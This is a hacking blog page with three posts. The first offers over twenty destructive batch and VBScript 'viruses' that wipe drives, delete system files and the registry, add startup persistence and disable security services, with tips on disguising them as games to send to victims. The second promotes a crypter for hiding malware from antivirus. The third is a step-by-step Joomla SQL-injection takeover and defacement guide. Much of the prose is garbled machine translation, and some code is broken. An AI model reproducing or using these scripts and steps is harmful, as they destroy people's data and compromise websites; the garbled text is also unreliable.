C-T-H

Thursday

// // 1 comment

Dangerous Computer Virus Ever

How to Make the virus ?

Note :

Here I am posting 21 program scripts which are helped in create a
virus using
notepad. Some of them will works on windows xp and. some of them in windows 7

Virus is a small infectious agent that reform only in cells of other living organisms . The virus can infect all kinds of life forms , animals and plants to bacteria and antiques .
 [ 1 ]
From 1892 paper describing Dmitry Ivanovski and without bacterial pathogen infects plants snuff and snuff discovery Beijerinckem Martinus mosaics from the 1898 virus description
 [ 2 ] about 5,000 viruses in detail 
[ 3 ] , even though there are millions of types different . 
[ 4 ] virus is present in almost every ecosystem on Earth and are the most abundant type of biological entity . 
[ 5 ] 
The word is from the Latin virus referring to poison and other noxious substances, first used in English in 1392
[ 6 ] It is well known that the study of viruses and virus less in microbiology .
Virus particles ( known as virions ) consist of two or three parts : i) genetic material DNA or RNA molecules that are all genetic information , b ) the protein coat that protects these genes , and in some cabinets c ) protein and fat wrap bed , in which the cell . Forms of the virus in the range of one helical and icosahedral forms complex structures . The virus is about half a percent of the average amount of bacteria . The Most viruses are too small to be seen directly with a light microscope .
Most of the viruses are in evolutionary history of life is unclear : some may have evolved from plasmids pieces of DNA that can move between cells , while others may have arisen from bacteria . In evolution , viruses are an important means of horizontal gene transfer , which increases genetic diversity . Considered 
[ 7 ] of some viruses is a way of life , because they make the genetic material and reproduce and evolve through natural selection . However, they lack important features ( for example , cell structures ) , which is generally regarded as essential to life . Because it is a number , but is describing , not all of the elements , and viruses , and " living on the edge of life " .
[ 8 ]
The virus is often transmitted from plant to plant plants by insects that feed on the sap of plants , such as aphids ; virus is spread in many ways the virus can be animal blood sucking insects . This is known as vectors of disease bearing organisms . Flu viruses spread through coughing and sneezing . Norovirus and rotavirus , the most common causes of viral gastroenteritis , and passed through the mouth and feces , and transferred from one person to another by contact , the body in food or water . HIV is one of several viruses transmitted through sexual contact and exposure to infected blood . The range of host cells , so that the virus can infect " host group . " It may be narrow or , as in the case where the virus is infecting many species , broad . 
[ 9 ]
Viral infections stimulate an immune response in animals that usually eliminates the infection . It can also cause an immune response of vaccines received artificial immunity granted to certain viral infections . However , some viruses including those causing AIDS and viral hepatitis around the immune responses and result in chronic inflammation . Antibiotics have no effect on viruses , but several antiviral drug development .

Here is a Batch File virus which can:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

No 2:-


Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .

No 3:-


How to crash a PC Forever !:::


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.


No 4 :-


How to stop someone's internet access::::


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

No 5 :-



ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a


No 6:-


Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.




No 7:-



Process:
Open Notepad
Copy the below command there 
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.

No 8 :-


Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

No 9 :-
Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

No 10:-

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

No 11 :-

Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

No 12:-


Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it. 

No 13 :-This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00


Save The Above Code As Anything.bat




No 14:-

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

No 15 :-

The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat

No 16 :-
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

No 17:-

Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

No 18 :-

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

No 19 :-


Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT



No 20 :-


System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

No 21:-

Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

How to Spread it:
Windows does'nt allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon. 
Right click on this shortcut
properties >>>..cutomize>>..choose icon
Now give an attractive icon to it. 
Now name it something intresting. eg. PROTOTYPE or IGI etc. 
Now your victim would think it to be the game , and he will be easily curropted.



I thought To post Some More Viruses Under This POst So Here Are They
How to stop someone's internet access::::


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u
will find the icon on ur desktop, dont open it, just right click on it
and press properties>change icon>select the icon the the internet
explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

Freeze someone's desktop:::


this is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now
in the desktop, we have 2 remove desktop icons and shortcuts, so right
click on the mouse and then properties, click on desktop then select
customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now
to remove the shortcuts in the desktop, go to start and select My
Computer, then click on c: right click on ur mouse and select new
folder, write it any name
6.now go to desktop & select all da
icons and right click on them then press cut,go to c: and paste them in
the folder dat u created then close the window.
7.now to put the
fake desktop image and remove the taskbar, so right click on desktop and
gp to properties, now go to desktop and select Browse, select the file
that u saved then press appply then ok. now to remove the windows
taskbar, right click on the taskbar and go 2 properties, then select
autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!

SHUT UR INTERNET PERMENANTLY:::


This
is a slightly more advanced one. It shuts down your internet
permanately. I tried it on myself accidently, i knew what it did, and it
still took me a couple of days to get my internet back. works best on
XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll
site or something. BTW, that 3rd line, isnt what disables the internet
permanately. It is somethinge else, that just provides a fast response
to shut down any connections.


@echo off
reg
add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t
REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a

MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::


Warning - Do not run it on your computer 

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-save it as matrix.bat
4-finish



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT


You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

1. Open Notepad and copy below code into it.


@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.


STEP:1- Open Notepad on your PC
STEP:2- copy it from here to your Notepad

                                         %0|%0

STEP:3- Then save it with a .bat extension.
When saving delete the .txt and input the File name with the .bat extension
Example:- fork.bat
STEP:4- Once anyone will do double click on this bat file, his COMPUTER WILL JAMM AND CRASH
Read More

Saturday

// // Leave a Comment

Download Fud Crypter Learn Hacking What is Crypter

Note : - You encryyption variety of techniques can be aware that this information is for educational purposes . Http://ComeToHack.com/ author or any of this information is not responsible for misuse . Our sole aim is to get people to protect themselves and the world can save themselves is to create awareness that is protected from piracy .
Download Fud Crypter free

People ! The issue of Education Progress FUD Crypter for you and provide a link to download it brings .

FUD about the debate, and a debate about this before I say Crypter .

What is Crypter ?

A Crypter our viruses , keyloggers or detected and removed by the antivirus to avoid being a mouse device is used to hide an antivirus software. Thus , crypter users of your program source code is a program that allows you to Crypt . In general, the distribution of the application source code and source code within the virus looks for a specific string . Antivirus detects any certain malicious strings , it either stops scan or system file as a virus and delete it.

What does Crypter ?

Only a hidden Crypter each individual code within source code adjust the values ​​. Therefore, it becomes invisible source . Therefore , a Trojan virus and encryption bypass virus detection upward and AV ( antivirus ) piracy without disabilities have achieved our goal . The program runs once Crypter deciphered not hide the source code to be

FUD Crypter how it works?

The following describes the key factor for FUD Crypter

Your Crypter EXE and it actually takes a binary file and end ( EOF ) file that stores encryption applies to many . Until the establishment of a new secret performance .

Original XXL encrypted
(Original) 001 ----- ( encrypted ) 010

No new antivirus X- crypter.When new implementation code because their Instantly turns out . exe file with a time binary data into small little pieces and decrypts pump in an existing process or a new blank or code ( not scanned by most alternative data streams has many parts / V) and then run it . TXT file or MP3.

How to manually difference between the original and encrypted file can?


An important point to note the code that hides Crypter file , but the file size can not hide . If the file size is 10KB Therefore , the Crypt and you want to encrypt our file File size 100 KB 100 KB 10 KB total size of the file will be encrypted ... No 110KB.

If you see the original file size only when the difference will be useful .

Now back to FUD .

What is FUD ?

FUD is an acronym for full disclosure can not be . To avoid antivirus with the increased use of encryption , AV ( antivirus ) and even indoor Crypter Crypter code to add definitions for the detection becomes more . Public Crypter is unavailable at this time because as , Ardamax Keylogger use of crypter to hide and mice , FUD is more complex .

Your infected mice CRYPT encryption available to the public , so that they are not detected by antivirus is necessary . Most FUD public release for a maximum of one or two days "FUD" Reason is encrypted stay . FUD for encrypting the forum search or make a piracy ( which is tedious , and I 'm working on it ) either .

Where is my Crypter FUD or not can check ?

And test their secret Crypter to prove any viruses and ensure that the sample is not distributed to tuck http://scanner.novirusthanks.org

Note: You do not check Crypter http://virustotal.com distributed samples with VirusTotal Scan Do not be a FUD Crypter .

Where in FUD Crypter free download can?

I get FUD.So Crypter FUD Crypter remain available so popular is not only made ​​by indivuals and searching.It by spending some time on Google can be found by any of those if there are benefits to be themselves , to see some friendly survey FUD virustoal.So doubt be better for a long time and will not keep you as its share FUD Crypter for me used here .

Free Download FUD Crypter

You can check the playing and not FUD Crypter link for free so I 'm giving you .

FUD Crypter for free download click here to
NameLast modifiedSizeDescription

[DIR]Parent Directory-
[DIR]gpg-crypter-0.2.1-1/04-Mar-2012 09:54 -
[DIR]gpg-crypter-0.2/04-Mar-2012 09:54 -
[DIR]gpg-crypter-0.3.5/22-Oct-2012 09:31 -
[DIR]gpg-crypter-0.3/05-Mar-2012 09:59 -
[DIR]gpg-crypter-0.4.1/02-Nov-2012 00:21 -
[DIR]gpg-crypter 0.1-alpha1/03-Mar-2012 09:52 -
[   ] Crypter.zip          29-Feb-2008 09:17   35K  


Yes , you learn hacking email id and receive regular updates make sure to subscribe , want to know more about us .. :)
Read More

Thursday

// // 1 comment

How To Hack Joomla Website (WMS) Learn Joomla Hacking

Togay going to 8 points discuss how to Joomla website can be ignored. And enter the game, and Hacker Joomla know how in less than -8? Ah, to be able to do this. However, if the user Joomla you do not know anything about the Joomla Hack to save your Joomla or so we come! For there is a way to keep the hacks on Joomla, I will show in this exhibition.

I will go through the experience and the next thing that should be done to stop them;

1. Over at the Joomla! / Extension / project.

2. Over use of vulnerable extensions / themes, and not from the time

3. Over helping the stolen information and login / weak

4. Over use of the software / server vulnerable old - Apache, PHP, MySQL.

5. Over the use of web server configuration

6. Over the full Health Management and Joomla on the same server

7. Over the wrong permissions Joomla

8. Over by the malware on the local PC can access the enemy's health



The patch released on July 31 , 2013 relating to the Joomla version 2.5.13 and 2.5.x before , and Joomla 3.1.4 and earlier versions 3.x. Joomla bug found by Versafe web safe and simple vulnerabilities are applied . Joomla version 2.5.14 and 3.1.5 . prepare and submit an unprivileged user to upload files live . PHP adding a " . " ( Tau ) at the end of the file name only PHP .
Back Joomla 2.5.x and 3.x versions , and one can access the media manager to download and execute code by a nurse at the end of the file name you want to run . For sites powered by Joomla version does not support ( 1.5.x and quick Google search shows that there are thousands of these sites and online 1.5.x ) , not the enemy after the data on the server for this to work with Joomla .
Acccording to the leader , and one - Versafe founder Ayal Gruner , in thousands of Phishing and malware killed in the consumer finance 30 + Umea in the first half of 2013 , the host Joomla based site 57 percent .
" What we saw last few months it is important to use a cheater can use the site to host the drive - Phishing babys killed , " said Gruner . He said the company received more than -100 in use to have accepted the malicious JavaScript that uses the Key bank account Trojan to help change the online fraud . Gruner said the release of the company using Joomla in early June .
Open - management system for easy distribution more content - can be put power in the hands of the tax that apply specifically to house whatungakaretao website . Earlier this month , warned as the safety of Arbor Networks found whatungakaretao website called " Fort dance " in Joomla and WordPress site is approved . Prior to this year , security firm Incapsula have found backdoored malicious code over 90,000 websites powered by WordPress .





Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

We hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

[Image: 001cv.png]

At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

[Image: 002rg.png]

==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have

[Image: 003bd.png]

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

[Image: 004k.png]

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request

[Image: 005hy.png]

Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

[Image: 006fj.png]

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

[Image: 007pa.png]

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!


To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

[Image: 009kw.png]
 
Read More

Earn 25$ Instant